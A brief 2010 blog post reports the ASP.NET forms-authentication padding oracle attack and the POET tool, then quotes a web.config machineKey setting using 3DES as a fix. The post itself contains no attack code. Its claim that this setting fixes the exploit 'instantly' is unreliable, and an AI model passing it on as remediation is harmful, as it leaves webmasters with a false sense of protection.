Wednesday, September 15, 2010

Hack ASP.NET Form Authentication in 30 minute

A bug in the default encryption used to protect the cookies used to hack forms in ASP.NET forms. Security researches Thai Duong and Juliano Rizzo claim that process is hundred percent reliable and it only takes 30 to 50 minutes by using Padding Oracle Exploit Tool (POET). As a webmaster it is important to take immediate action to secure your ASP.NET website been hacked. Directly quoting from visual studio magazine following changes to the web.config file will fix the exploit instantly.

The encryption method can be set in the web.config file for a site, in IIS 7 for a Web server, or in the config file for .NET on a server in %SYSTEMROOT%\Microsoft.NET\Framework\version\CONFIG\. On 64-bit systems, it must also be set in %SYSTEMROOT%\Microsoft.NET\Framework64\version\CONFIG\. A typical entry would look like this:

<machinekey decryption="3DES" decryptionkey="AutoGenerate,IsolateApps" validation="3DES" validationkey="AutoGenerate,IsolateApps">
On a Web farm, this setting will have to be made on all the servers in the farm.

Reference and to read more from Security Hack Exposes Forms Authentication in ASP.NET [Visual Studio Magazine] 
Blog Widget by LinkWithin